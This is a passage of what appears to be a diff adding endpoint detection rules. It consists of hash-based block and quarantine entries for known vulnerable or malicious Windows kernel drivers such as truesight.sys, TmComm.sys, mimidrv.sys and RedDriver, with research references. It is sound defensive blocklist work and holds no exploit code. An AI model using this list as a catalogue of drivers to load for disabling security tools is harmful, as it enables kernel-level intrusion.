+ "value": "19df9b27dee18537afd1367f3c6eef1d230faa240b4855e856c37d3901a39aca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a627b995-c62d-5876-9a7b-289c1940c199",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974281Z",
+ "creation_date": "2026-03-23T11:45:29.974283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd54115ef08b107691425e4c0bf94dc0ae7c522fba60a0ce3f574ebf4f5dbc5a",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6374395-1056-51d6-933a-106cdaf69573",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160403Z",
+ "creation_date": "2026-03-23T11:45:31.160405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02190b5e96bad0a78fe6bc6f13a942bde1a96536693b3cea40082c0f1cfa45eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6417a56-214e-538b-94b0-510530928d41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615572Z",
+ "creation_date": "2026-03-23T11:45:29.615574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615579Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5dfb950d4771c35f4f82626b5d8859cce74bf03db67f2be3036631894a62eca8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a642bf80-0921-55fe-807d-37394983ed61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157222Z",
+ "creation_date": "2026-03-23T11:45:31.157224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13be73dd4f1e2db2a4621119f30429438a2331c5c7e1a07bf6f98ba96c16e069",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a647ebb2-66d0-5b95-b5eb-1e687e406b51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143961Z",
+ "creation_date": "2026-03-23T11:45:32.143964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "828c54cfecb2a08863319544ac716aee3898dfe78a87d7757a0e92f1b1f1daf1",
+ "comment": "Vulnerable Kernel Driver (aka CSC.sys) [https://www.loldrivers.io/drivers/1c92e1bf-103b-4545-b242-e5a9858ec9c8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a64c1161-3379-5369-8f72-ebdcc4708aa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491320Z",
+ "creation_date": "2026-03-23T11:45:31.491323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b625c7345f7a62e55948a916d0f6e6a9d8f836703a5d22f196b8b322e030596d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a658f3fe-1258-5534-bfd0-9cf13cfa6827",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812351Z",
+ "creation_date": "2026-03-23T11:45:31.812354Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a4339bc237e6e415e6a754864933793d9397a1cd968b569d49c96ca141f599a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a65cb1b7-cc50-5908-9688-4f6c902816e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827265Z",
+ "creation_date": "2026-03-23T11:45:31.827269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827277Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58cb3c3716f8079ebed0ee562944bfde2d4aa80101f20fde64bf04359748da37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a66a31b0-5be6-52de-ac8c-a35b0796bd25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830320Z",
+ "creation_date": "2026-03-23T11:45:31.830323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f71ef083ea97d9d6592f47a57c52cc6957ba2f356fa2b122a9539ddac4623f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a67209af-ad96-505e-be74-afa40c793bea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500548Z",
+ "creation_date": "2026-03-23T11:45:31.500552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb015d75e98e2633b848af2b60af346dcdc9c04f00826b231bfd8f6c1ed5a41b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a684e42b-479f-516c-86af-e32b3433738a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154111Z",
+ "creation_date": "2026-03-23T11:45:31.154113Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "294ef849be00f2170346427b820cb55e31dd56c968123f56cd7c9dc7943de849",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a69c2f15-320a-5da4-b433-0919232f9f51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813896Z",
+ "creation_date": "2026-03-23T11:45:31.813898Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "032ae4119bbded768bf334d9148771b0fc07ae15bdc6e29999527895e7f63c4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6a9032e-4e8f-5e26-b152-167a54ad7a5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825072Z",
+ "creation_date": "2026-03-23T11:45:30.825076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7da3710a0de72e7c493716a4a017703494dbb5f13799b53bf5c105850a840575",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6b04357-8f15-5494-bf90-6b81d57d0ae3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464788Z",
+ "creation_date": "2026-03-23T11:45:30.464791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aab2deae90717a8876d46d257401d265cf90a5db4c57706e4003c19eee33550",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6b45b5c-1579-5fe1-97de-65978971e5ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492144Z",
+ "creation_date": "2026-03-23T11:45:31.492146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d49194d09db9c501d3b6d4f0b3a4703dfcfbde65038cbdb3c389e980114f1e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6bd9a47-cf8c-5369-b562-5e9ac79a86f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976245Z",
+ "creation_date": "2026-03-23T11:45:29.976247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6d1cf8b-e188-51fd-9bf6-a160e27bfd0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469543Z",
+ "creation_date": "2026-03-23T11:45:30.469546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d8ec21cc6bad738a8eef146506d04c64282bce01d9659e7f4dcdbff95e4c34",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6da58d9-8184-5224-8fe8-0f654e48124d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811645Z",
+ "creation_date": "2026-03-23T11:45:31.811647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811653Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a905284d68ba108446af0ea42c9a797dd8c2ba302b0ad89b2efc94a6b31029eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6e4547b-57ed-599e-bc88-ad766b5d8de9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827568Z",
+ "creation_date": "2026-03-23T11:45:31.827570Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e71eb48affb34a84f6126ff828227a5e14d8cea137237b317c1f9069d7d4bb3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6e72e07-b5d2-58b5-bae0-515da98d8af5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480842Z",
+ "creation_date": "2026-03-23T11:45:30.480846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "797c1f883d90d25e7fd553624bb16bfd5db24c2658aa0c3c51c715d5833c10fd",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a6f9eb61-4d85-5d5b-8701-20dcc5defc3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985961Z",
+ "creation_date": "2026-03-23T11:45:29.985963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a84703552ae032a0d1699a081e422ed6c958bbe56d5b41839c8bfa6395bee1d",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7065736-c0bd-5429-b170-6c6c292bac30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615099Z",
+ "creation_date": "2026-03-23T11:45:29.615101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18776682fcc0c6863147143759a8d4050a4115a8ede0136e49a7cf885c8a4805",
